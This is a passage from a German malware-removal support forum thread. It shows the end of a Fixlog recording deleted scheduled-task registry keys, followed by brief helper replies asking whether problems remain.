"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Awiikjuw" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FD4BD04B-AE55-4A01-A755-4E28A2548E48}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD4BD04B-AE55-4A01-A755-4E28A2548E48}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0D0B7D47-0F7D-040B-7811-090D050F117E} => Schlüssel nicht gefunden. 


Das System musste neu gestartet werden.

==== Ende von Fixlog 20:39:19 ====

deeprybka · 11.02.2016, 21:26

OK.

09.02.2016, 19:11	#7
deeprybka /// TB-Ausbilder /// Anleitungs-Guru	Windows 8.x mit einer großen Auswahl an Schädlingen Sieht gut aus. Welche Probleme bestehen noch? __________________ Gruß deeprybka Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer

11.02.2016, 21:26	#11
deeprybka /// TB-Ausbilder /// Anleitungs-Guru	Windows 8.x mit einer großen Auswahl an Schädlingen OK. __________________ Gruß deeprybka Lob, Kritik, Wünsche? Spende fürs trojaner-board? _______________________________________________ „Neminem laede, immo omnes, quantum potes, iuva.“ Arthur Schopenhauer

Windows 8.x mit einer großen Auswahl an Schädlingen

Plagegeister aller Art und deren Bekämpfung: Windows 8.x mit einer großen Auswahl an Schädlingen